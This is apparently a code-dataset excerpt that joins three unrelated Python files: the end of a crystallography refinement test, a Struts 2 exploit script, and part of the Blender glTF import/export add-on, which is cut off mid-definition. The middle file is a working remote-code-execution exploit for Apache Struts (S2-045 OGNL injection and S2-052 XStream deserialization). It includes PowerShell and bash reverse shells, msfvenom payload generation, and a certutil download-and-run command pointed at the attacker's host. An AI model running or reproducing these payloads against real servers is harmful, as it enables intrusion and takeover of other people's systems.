print("Initial values of parameters are")
msg = "Parameters: " + "%.5f " * len(pred_param)
print(msg % tuple(pred_param.get_param_vals()))
print()
#####################################
# Select reflections for refinement #
#####################################
refman = ReflectionManager(obs_refs, experiments)
##############################
# Set up the target function #
##############################
# The current 'achieved' criterion compares RMSD against 1/3 the pixel size and
# 1/3 the image width in radians. For the simulated data, these are just made up
mytarget = LeastSquaresPositionalResidualWithRmsdCutoff(
experiments, ref_predictor, refman, pred_param, restraints_parameterisation=None
)
################################
# Set up the refinement engine #
################################
refiner = setup_minimiser.Extract(
master_phil, mytarget, pred_param, cmdline_args=args
).refiner
print("Prior to refinement the experimental model is:")
print(mybeam)
print(mydetector)
print(mycrystal)
refiner.run()
print()
print("Refinement has completed with the following geometry:")
print(mybeam)
print(mydetector)
print(mycrystal)
if __name__ == "__main__":
test(sys.argv[1:])
| 34.212996 | 88 | 0.652105 |
795c76e73138530bad4f876a2c755b6861bc4164 | 10,333 | py | Python | S2-045_n_S2-052_rce.py | m4udSec/S2-045-and-S2-051-Struts-2-in-1 | 654ad5df594542f13392c5fa4a3915fe024f278b | [
"MIT"
] | 2 | 2021-12-02T17:50:14.000Z | 2021-12-02T17:50:16.000Z | S2-045_n_S2-052_rce.py | m4udSec/S2-045-and-S2-052-Struts-2-in-1 | 654ad5df594542f13392c5fa4a3915fe024f278b | [
"MIT"
] | null | null | null | S2-045_n_S2-052_rce.py | m4udSec/S2-045-and-S2-052-Struts-2-in-1 | 654ad5df594542f13392c5fa4a3915fe024f278b | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Author (m4ud)
# Apache Struts-045
# CVE : 2017-5638
from base64 import b64encode
import sys
import requests
from optparse import OptionParser
import os
import subprocess
import http.server
import threading
import time
def serverShutdown(server):
server = struts(options)
server.stop()
print("Shutting Server down!")
class struts:
def __init__(self, options):
self.target = options.target
self.directory = options.directory
self.command = options.command
self.rport = options.rport
self.osys = options.osys
self.lport = options.lport
self.lhost = options.lhost
self.wport = options.wport
self.shell = options.shell
self.xploit = options.xploit
self.target = 'http://' + options.target #Vulnerable Server
port = self.rport
directory = self.directory # Struts Application directory
cmd = self.command
def srv(self):
server_address = (self.lhost, int(self.wport))
global httpd
self.httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.start()
print("\r\n[+] (m4ud) AS-045 RCE [+]\r\n")
print("[+] Serving Payload at port " + str(self.wport) +" [+]\r\n")
return self.httpd
def stop(self):
print("\r\n[+] Shutting Server down! [+]\r\n")
self.httpd.shutdown()
self.httpd.server_close()
def pwrsh(self):
print("\r\n[+] (m4ud) AS-045 RCE [+]")
print("\r\n[*] Deploying PowerShell [*]\r\n")
payload = "$client = New-Object System.Net.Sockets.TCPClient('" + self.lhost + "'," + str(self.lport) + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS(m4ud) ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
payload = b64encode(payload.encode('UTF-16LE')).decode()
return payload
def bsh():
payload = "bash -i >&/dev/tcp/%s/%s 0>&1" % (self.lhost, str(self.lport))
return payload
def venom(self, shell, ext):
os.system("msfvenom -p "+ shell + "/shell_reverse_tcp LHOST=" + self.lhost+ " LPORT="+ str(self.lport) + " -f "+ ext+ " > shelb")
def exp(self):
if self.osys == "1":
shell = "windows"
ext = "exe"
if self.command is not None:
cmd = self.command
cmd = b64encode(cmd.encode('UTF-16LE')).decode()
if self.shell == "1":
cmd = self.pwrsh()
elif self.shell == "2":
self.venom(shell, ext)
self.srv()
os.system('mv shelb shelb.exe')
cmd = "certutil -urlcache -f -split http://%s:%s/shelb.exe;.\shelb.exe" % (self.lhost, self.wport)
cmd = b64encode(cmd.encode('UTF-16LE')).decode()
if self.osys == "2":
shell = "linux"
ext = "elf"
if self.shell == "1":
cmd = bsh()
elif self.shell == "2":
venom(shell, ext)
cmd = "curl http://%s/shelb |bash"
cmd = bsh()
URL = self.target + ':' + str(self.rport) + '/' + self.directory + '/'
if self.xploit == "1":
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'powershell.exe','-nop','-e',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
else:
payload = """
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>powershell.exe</string>
<string>-nop</string>
<string>-e</string>
<string>""" + cmd + """\n</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>mwxNZJ805CPS7DKLm1rUgET1</name>
</filter>
<next class="string">xkruIdjzook1CwMqglq04G0rmN0Sz</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>"""
headers = {'Content-Type': 'application/xml', 'Connection': 'close',}
if self.command is None and self.shell == "2" and self.xploit == "1":
while True:
try:
f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
r = requests.get(URL, headers=headers)
f.communicate()
except KeyboardInterrupt:
t2 = threading.Thread(target=self.stop())
t2.daemon = True
t2.start()
print("Bye")
sys.exit()
elif self.command is None and self.shell == "1" and self.xploit == "1":
while True:
try:
f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
r = requests.get(URL, headers=headers)
f.communicate()
except KeyboardInterrupt:
print("Bye")
sys.exit()
elif self.command is not None:
while True:
try:
r = requests.get(URL, headers=headers)
except KeyboardInterrupt:
print("Bye")
sys.exit()
elif self.command is None and self.shell == "2" and self.xploit == "2":
while True:
try:
f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
r = requests.post(URL, headers=headers, data=payload)
f.communicate()
except KeyboardInterrupt:
t2 = threading.Thread(target=self.stop())
t2.daemon = True
t2.start()
print("Bye")
sys.exit()
# elif self.command is None and self.shell == "1" and self.xploit == "1":
else:
while True:
try:
f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
r = requests.post(URL, headers=headers, data=payload)
f.communicate()
except KeyboardInterrupt:
print("Bye")
sys.exit()
def main():
parser = OptionParser()
parser.add_option("-p", "--rport", dest="rport", default=8080, help="RPORT, ")
parser.add_option("-t", "--target", dest="target", help="Vulnerable Target, ")
parser.add_option("-d", "--dir", dest="directory",default='struts2-rest-showcase', help="Struts Application directory, ")
parser.add_option("-c", "--command", dest="command", help="System Command, ")
parser.add_option("-o", "--os", dest="osys", help="Choose OS: Windows = 1, Linux = 2")
parser.add_option("-l", "--lhost", dest="lhost", help="LHOST")
parser.add_option("-P", "--lport", dest="lport",default=9001 ,help="LPORT")
parser.add_option("-w", "--wport", dest="wport", default=4443, help="WPORT")
parser.add_option("-s", "--shell", dest="shell", help="Shell type: 1 = powershell or bash, and 2 = msfvenom")
parser.add_option("-x","--xploit", dest="xploit",default="1", help="1 = S2-045 and 2 = S2-52")
(options, args) = parser.parse_args()
if options.target:
server = struts(options)
server.exp()
if __name__=="__main__":
main()
| 39.288973 | 546 | 0.566438 |
795c771e9ffa843ee2865de0b785fc3df23c6e22 | 32,484 | py | Python | addons/io_scene_gltf2/__init__.py | julienduroure/glTF-Blender-IO | 406a409d4740e6a67ec3e8699c7dec40afe5067e | [
"Apache-2.0"
] | 2 | 2020-02-04T05:21:42.000Z | 2020-08-29T09:49:06.000Z | addons/io_scene_gltf2/__init__.py | julienduroure/glTF-Blender-IO | 406a409d4740e6a67ec3e8699c7dec40afe5067e | [
"Apache-2.0"
] | null | null | null | addons/io_scene_gltf2/__init__.py | julienduroure/glTF-Blender-IO | 406a409d4740e6a67ec3e8699c7dec40afe5067e | [
"Apache-2.0"
] | null | null | null | # Copyright 2018-2019 The glTF-Blender-IO authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
bl_info = {
'name': 'glTF 2.0 format',
'author': 'Julien Duroure, Norbert Nopper, Urs Hanselmann, Moritz Becher, Benjamin Schmithüsen, Jim Eckerlein, and many external contributors',
"version": (1, 1, 0),
'blender': (2, 81, 6),
'location': 'File > Import-Export',
'description': 'Import-Export as glTF 2.0',
'warning': '',
'wiki_url': "https://docs.blender.org/manual/en/latest/addons/io_scene_gltf2.html",
'tracker_url': "https://github.com/KhronosGroup/glTF-Blender-IO/issues/",
'support': 'OFFICIAL',
'category': 'Import-Export',
}
def get_version_string():
return str(bl_info['version'][0]) + '.' + str(bl_info['version'][1]) + '.' + str(bl_info['version'][2])
#
# Script reloading (if the user calls 'Reload Scripts' from Blender)
#
def reload_package(module_dict_main):
import importlib
from pathlib import Path
def reload_package_recursive(current_dir, module_dict):
for path in current_dir.iterdir():
if "__init__" in str(path) or path.stem not in module_dict:
continue
if path.is_file() and path.suffix == ".py":
importlib.reload(module_dict[path.stem])
elif path.is_dir():
reload_package_recursive(path, module_dict[path.stem].__dict__)
reload_package_recursive(Path(__file__).parent, module_dict_main)
if "bpy" in locals():
reload_package(locals())
import bpy
from bpy.props import (StringProperty,
BoolProperty,
EnumProperty,
IntProperty,
CollectionProperty)
from bpy.types import Operator
from bpy_extras.io_utils import ImportHelper, ExportHelper
#
# Functions / Classes.
#
class ExportGLTF2_Base:
# TODO: refactor to avoid boilerplate
def __init__(self):
from io_scene_gltf2.io.exp import gltf2_io_draco_compression_extension
self.is_draco_available = gltf2_io_draco_compression_extension.dll_exists()
bl_options = {'UNDO', 'PRESET'}
export_format = EnumProperty(
name='Format',
items=(('GLB', 'glTF Binary (.glb)',
'Exports a single file, with all data packed in binary form. '
'Most efficient and portable, but more difficult to edit later'),
('GLTF_EMBEDDED', 'glTF Embedded (.gltf)',
'Exports a single file, with all data packed in JSON. '
'Less efficient than binary, but easier to edit later'),
('GLTF_SEPARATE', 'glTF Separate (.gltf + .bin + textures)',
'Exports multiple files, with separate JSON, binary and texture data. '
'Easiest to edit later')),
description=(
'Output format and embedding options. Binary is most efficient, '
'but JSON (embedded or separate) may be easier to edit later'
),
default='GLB'
)
ui_tab = EnumProperty(
items=(('GENERAL', "General", "General settings"),
('MESHES', "Meshes", "Mesh settings"),
('OBJECTS', "Objects", "Object settings"),
('ANIMATION', "Animation", "Animation settings")),
name="ui_tab",
description="Export setting categories",
)
export_copyright = StringProperty(
name='Copyright',
description='Legal rights and conditions for the model',
default=''
)
export_image_format = EnumProperty(
name='Images',
items=(('NAME', 'Automatic',
'Determine the image format from the blender image name'),
('JPEG', 'JPEG Format (.jpg)',
'Encode and save textures as .jpg files. Be aware of a possible loss in quality'),
('PNG', 'PNG Format (.png)',
'Encode and save textures as .png files')
),
description=(
'Output format for images. PNG is lossless and generally preferred, but JPEG might be preferable for web '
'applications due to the smaller file size'
),
default='NAME'
)
export_texcoords = BoolProperty(
name='UVs',
description='Export UVs (texture coordinates) with meshes',
default=True
)
export_normals = BoolProperty(
name='Normals',
description='Export vertex normals with meshes',
default=True
)
export_draco_mesh_compression_enable = BoolProperty(
name='Draco mesh compression',
description='Compress mesh using Draco',
default=False
)
export_draco_mesh_compression_level = IntProperty(
name='Compression level',
description='Compression level (0 = most speed, 6 = most compression, higher values currently not supported)',
default=6,
min=0,
max=6
)
export_draco_position_quantization = IntProperty(
name='Position quantization bits',
description='Quantization bits for position values (0 = no quantization)',
default=14,
min=0,
max=30
)
export_draco_normal_quantization = IntProperty(
name='Normal quantization bits',
description='Quantization bits for normal values (0 = no quantization)',
default=10,
min=0,
max=30
)
export_draco_texcoord_quantization = IntProperty(
name='Texcoord quantization bits',
description='Quantization bits for texture coordinate values (0 = no quantization)',
default=12,
min=0,
max=30
)
export_tangents = BoolProperty(
name='Tangents',
description='Export vertex tangents with meshes',
default=False
)
export_materials = BoolProperty(
name='Materials',
description='Export materials',
default=True
)
export_colors = BoolProperty(
name='Vertex Colors',
description='Export vertex colors with meshes',
default=True
)
export_cameras = BoolProperty(
name='Cameras',
description='Export cameras',
default=False
)
export_selected = BoolProperty(
name='Selected Objects',
description='Export selected objects only',
default=False
)
export_extras = BoolProperty(
name='Custom Properties',
description='Export custom properties as glTF extras',
default=False
)
export_yup = BoolProperty(
name='+Y Up',
description='Export using glTF convention, +Y up',
default=True
)
export_apply = BoolProperty(
name='Apply Modifiers',
description='Apply modifiers (excluding Armatures) to mesh objects -'
'WARNING: prevents exporting shape keys',
default=False
)
export_animations = BoolProperty(
name='Animations',
description='Exports active actions and NLA tracks as glTF animations',
default=True
)
export_frame_range = BoolProperty(
name='Limit to Playback Range',
description='Clips animations to selected playback range',
default=True
)
export_frame_step = IntProperty(
name='Sampling Rate',
description='How often to evaluate animated values (in frames)',
default=1,
min=1,
max=120
)
export_force_sampling = BoolProperty(
name='Always Sample Animations',
description='Apply sampling to all animations',
default=True
)
export_nla_strips = BoolProperty(
name='NLA Strips',
description='Export NLA Strip animations',
default=True
)
export_def_bones = BoolProperty(
name='Export Deformation bones only',
description='Export Deformation bones only (and needed bones for hierarchy)',
default=False
)
export_current_frame = BoolProperty(
name='Use Current Frame',
description='Export the scene in the current animation frame',
default=False
)
export_skins = BoolProperty(
name='Skinning',
description='Export skinning (armature) data',
default=True
)
export_all_influences = BoolProperty(
name='Include All Bone Influences',
description='Allow >4 joint vertex influences. Models may appear incorrectly in many viewers',
default=False
)
export_morph = BoolProperty(
name='Shape Keys',
description='Export shape keys (morph targets)',
default=True
)
export_morph_normal = BoolProperty(
name='Shape Key Normals',
description='Export vertex normals with shape keys (morph targets)',
default=True
)
export_morph_tangent = BoolProperty(
name='Shape Key Tangents',
description='Export vertex tangents with shape keys (morph targets)',
default=False
)
export_lights = BoolProperty(
name='Punctual Lights',
description='Export directional, point, and spot lights. '
'Uses "KHR_lights_punctual" glTF extension',
default=False
)
export_displacement = BoolProperty(
name='Displacement Textures (EXPERIMENTAL)',
description='EXPERIMENTAL: Export displacement textures. '
'Uses incomplete "KHR_materials_displacement" glTF extension',
default=False
)
will_save_settings = BoolProperty(
name='Remember Export Settings',
description='Store glTF export settings in the Blender project',
default=False)
# Custom scene property for saving settings
scene_key = "glTF2ExportSettings"
#
def invoke(self, context, event):
settings = context.scene.get(self.scene_key)
self.will_save_settings = False
if settings:
try:
for (k, v) in settings.items():
setattr(self, k, v)
self.will_save_settings = True
except (AttributeError, TypeError):
self.report({"ERROR"}, "Loading export settings failed. Removed corrupted settings")
del context.scene[self.scene_key]
return ExportHelper.invoke(self, context, event)
def save_settings(self, context):
# find all export_ props
all_props = self.properties
export_props = {x: getattr(self, x) for x in dir(all_props)
if x.startswith("export_") and all_props.get(x) is not None}
context.scene[self.scene_key] = export_props
def execute(self, context):
import os
import datetime
from .blender.exp import gltf2_blender_export
if self.will_save_settings:
self.save_settings(context)
if self.export_format == 'GLB':
self.filename_ext = '.glb'
else:
self.filename_ext = '.gltf'
# All custom export settings are stored in this container.
export_settings = {}
export_settings['timestamp'] = datetime.datetime.now()
export_settings['gltf_filepath'] = bpy.path.ensure_ext(self.filepath, self.filename_ext)
export_settings['gltf_filedirectory'] = os.path.dirname(export_settings['gltf_filepath']) + '/'
export_settings['gltf_format'] = self.export_format
export_settings['gltf_image_format'] = self.export_image_format
export_settings['gltf_copyright'] = self.export_copyright
export_settings['gltf_texcoords'] = self.export_texcoords
export_settings['gltf_normals'] = self.export_normals
export_settings['gltf_tangents'] = self.export_tangents and self.export_normals
if self.is_draco_available:
export_settings['gltf_draco_mesh_compression'] = self.export_draco_mesh_compression_enable
export_settings['gltf_draco_mesh_compression_level'] = self.export_draco_mesh_compression_level
export_settings['gltf_draco_position_quantization'] = self.export_draco_position_quantization
export_settings['gltf_draco_normal_quantization'] = self.export_draco_normal_quantization
export_settings['gltf_draco_texcoord_quantization'] = self.export_draco_texcoord_quantization
else:
export_settings['gltf_draco_mesh_compression'] = False
export_settings['gltf_materials'] = self.export_materials
export_settings['gltf_colors'] = self.export_colors
export_settings['gltf_cameras'] = self.export_cameras
export_settings['gltf_selected'] = self.export_selected
export_settings['gltf_layers'] = True # self.export_layers
export_settings['gltf_extras'] = self.export_extras
export_settings['gltf_yup'] = self.export_yup
export_settings['gltf_apply'] = self.export_apply
export_settings['gltf_current_frame'] = self.export_current_frame
export_settings['gltf_animations'] = self.export_animations
if self.export_animations:
export_settings['gltf_frame_range'] = self.export_frame_range
export_settings['gltf_force_sampling'] = self.export_force_sampling
if self.export_force_sampling:
export_settings['gltf_def_bones'] = self.export_def_bones
else:
export_settings['gltf_def_bones'] = False
export_settings['gltf_nla_strips'] = self.export_nla_strips
else:
export_settings['gltf_frame_range'] = False
export_settings['gltf_move_keyframes'] = False
export_settings['gltf_force_sampling'] = False
export_settings['gltf_def_bones'] = False
export_settings['gltf_skins'] = self.export_skins
if self.export_skins:
export_settings['gltf_all_vertex_influences'] = self.export_all_influences
else:
export_settings['gltf_all_vertex_influences'] = False
export_settings['gltf_frame_step'] = self.export_frame_step
export_settings['gltf_morph'] = self.export_morph
if self.export_morph:
export_settings['gltf_morph_normal'] = self.export_morph_normal
else:
export_settings['gltf_morph_normal'] = False
if self.export_morph and self.export_morph_normal:
export_settings['gltf_morph_tangent'] = self.export_morph_tangent
else:
export_settings['gltf_morph_tangent'] = False
export_settings['gltf_lights'] = self.export_lights
export_settings['gltf_displacement'] = self.export_displacement
export_settings['gltf_binary'] = bytearray()
export_settings['gltf_binaryfilename'] = os.path.splitext(os.path.basename(
bpy.path.ensure_ext(self.filepath,self.filename_ext)))[0] + '.bin'
return gltf2_blender_export.save(context, export_settings)
if bpy.app.version < (2, 80, 0):
def draw(self, context):
self.layout.prop(self, 'ui_tab', expand=True)
if self.ui_tab == 'GENERAL':
self.draw_general_settings()
elif self.ui_tab == 'MESHES':
self.draw_mesh_settings()
elif self.ui_tab == 'OBJECTS':
self.draw_object_settings()
elif self.ui_tab == 'MATERIALS':
self.draw_material_settings()
elif self.ui_tab == 'ANIMATION':
self.draw_animation_settings()
def draw_general_settings(self):
col = self.layout.box().column()
col.prop(self, 'export_format')
col.prop(self, 'export_selected')
col.prop(self, 'export_apply')
col.prop(self, 'export_yup')
col.prop(self, 'export_extras')
col.prop(self, 'will_save_settings')
col.prop(self, 'export_copyright')
def draw_mesh_settings(self):
col = self.layout.box().column()
col.prop(self, 'export_texcoords')
col.prop(self, 'export_normals')
if self.export_normals:
col.prop(self, 'export_tangents')
col.prop(self, 'export_colors')
col.prop(self, 'export_materials')
if self.export_materials:
col.prop(self, 'export_image_format')
# Add Draco compression option only if the DLL could be found.
if self.is_draco_available:
col.prop(self, 'export_draco_mesh_compression_enable')
# Display options when Draco compression is enabled.
if self.export_draco_mesh_compression_enable:
col.prop(self, 'export_draco_mesh_compression_level')
col.prop(self, 'export_draco_position_quantization')
col.prop(self, 'export_draco_normal_quantization')
col.prop(self, 'export_draco_texcoord_quantization')
def draw_object_settings(self):
col = self.layout.box().column()
col.prop(self, 'export_cameras')
col.prop(self, 'export_lights')
def draw_animation_settings(self):
col = self.layout.box().column()
col.prop(self, 'export_current_frame')
col.prop(self, 'export_animations')
if self.export_animations:
col.prop(self, 'export_frame_range')
col.prop(self, 'export_frame_step')
col.prop(self, 'export_force_sampling')
if self.export_force_sampling:
col.prop(self, 'export_def_bones')
col.prop(self, 'export_skins')
if self.export_skins:
col.prop(self, 'export_all_influences')
col.prop(self, 'export_morph')
if self.export_morph:
col.prop(self, 'export_morph_normal')
if self.export_morph_normal:
col.prop(self, 'export_morph_tangent')
else:
def draw(self, context):
pass
class GLTF_PT_export_main(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "EXPORT_SCENE_OT_gltf"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator, 'export_format')
layout.prop(operator, 'export_copyright')
layout.prop(operator, 'will_save_settings')
class GLTF_PT_export_include(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Include"
bl_parent_id = "FILE_PT_operator"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "EXPORT_SCENE_OT_gltf"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator, 'export_selected')
layout.prop(operator, 'export_extras')
layout.prop(operator, 'export_cameras')
layout.prop(operator, 'export_lights')
class GLTF_PT_export_transform(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Transform"
bl_parent_id = "FILE_PT_operator"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "EXPORT_SCENE_OT_gltf"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator, 'export_yup')
class GLTF_PT_export_geometry(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Geometry"
bl_parent_id = "FILE_PT_operator"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "EXPORT_SCENE_OT_gltf"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator, 'export_apply')
layout.prop(operator, 'export_texcoords')
layout.prop(operator, 'export_normals')
col = layout.column()
col.active = operator.export_normals
col.prop(operator, 'export_tangents')
layout.prop(operator, 'export_colors')
layout.prop(operator, 'export_materials')
col = layout.column()
col.active = operator.export_materials
col.prop(operator, 'export_image_format')
class GLTF_PT_export_geometry_compression(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Compression"
bl_parent_id = "GLTF_PT_export_geometry"
bl_options = {'DEFAULT_CLOSED'}
def __init__(self):
from io_scene_gltf2.io.exp import gltf2_io_draco_compression_extension
self.is_draco_available = gltf2_io_draco_compression_extension.dll_exists()
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
if operator.is_draco_available:
return operator.bl_idname == "EXPORT_SCENE_OT_gltf"
def draw_header(self, context):
sfile = context.space_data
operator = sfile.active_operator
self.layout.prop(operator, "export_draco_mesh_compression_enable", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
sfile = context.space_data
operator = sfile.active_operator
layout.active = operator.export_draco_mesh_compression_enable
layout.prop(operator, 'export_draco_mesh_compression_level')
col = layout.column(align=True)
col.prop(operator, 'export_draco_position_quantization', text="Quantize Position")
col.prop(operator, 'export_draco_normal_quantization', text="Normal")
col.prop(operator, 'export_draco_texcoord_quantization', text="Tex Coords")
class GLTF_PT_export_animation(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Animation"
bl_parent_id = "FILE_PT_operator"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "EXPORT_SCENE_OT_gltf"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator, 'export_current_frame')
class GLTF_PT_export_animation_export(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Animation"
bl_parent_id = "GLTF_PT_export_animation"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "EXPORT_SCENE_OT_gltf"
def draw_header(self, context):
sfile = context.space_data
operator = sfile.active_operator
self.layout.prop(operator, "export_animations", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
sfile = context.space_data
operator = sfile.active_operator
layout.active = operator.export_animations
layout.prop(operator, 'export_frame_range')
layout.prop(operator, 'export_frame_step')
layout.prop(operator, 'export_force_sampling')
layout.prop(operator, 'export_nla_strips')
row = layout.row()
row.active = operator.export_force_sampling
row.prop(operator, 'export_def_bones')
class GLTF_PT_export_animation_shapekeys(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Shape Keys"
bl_parent_id = "GLTF_PT_export_animation"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "EXPORT_SCENE_OT_gltf"
def draw_header(self, context):
sfile = context.space_data
operator = sfile.active_operator
self.layout.prop(operator, "export_morph", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
sfile = context.space_data
operator = sfile.active_operator
layout.active = operator.export_morph
layout.prop(operator, 'export_morph_normal')
col = layout.column()
col.active = operator.export_morph_normal
col.prop(operator, 'export_morph_tangent')
class GLTF_PT_export_animation_skinning(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Skinning"
bl_parent_id = "GLTF_PT_export_animation"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "EXPORT_SCENE_OT_gltf"
def draw_header(self, context):
sfile = context.space_data
operator = sfile.active_operator
self.layout.prop(operator, "export_skins", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
sfile = context.space_data
operator = sfile.active_operator
layout.active = operator.export_skins
layout.prop(operator, 'export_all_influences')
class ExportGLTF2(bpy.types.Operator, ExportGLTF2_Base, ExportHelper):
"""Export scene as glTF 2.0 file"""
bl_idname = 'export_scene.gltf'
bl_label = 'Export glTF 2.0'
filename_ext = ''
filter_glob = StringProperty(default='*.glb;*.gltf', options={'HIDDEN'})
def menu_func_export(self, context):
self.layout.operator(ExportGLTF2.bl_idname, text='glTF 2.0 (.glb/.gltf)')
class ImportGLTF2(Operator, ImportHelper):
"""Load a glTF 2.0 file"""
bl_idname = 'import_scene.gltf'
bl_label = 'Import glTF 2.0'
filter_glob = StringProperty(default="*.glb;*.gltf", options={'HIDDEN'})
files = CollectionProperty(
name="File Path",
type=bpy.types.OperatorFileListElement,
)
loglevel = IntProperty(
name='Log Level',
description="Log Level")
import_pack_images = BoolProperty(
name='Pack images',
description='Pack all images into .blend file',
default=True
)
import_shading = EnumProperty(
name="Shading",
items=(("NORMALS", "Use Normal Data", ""),
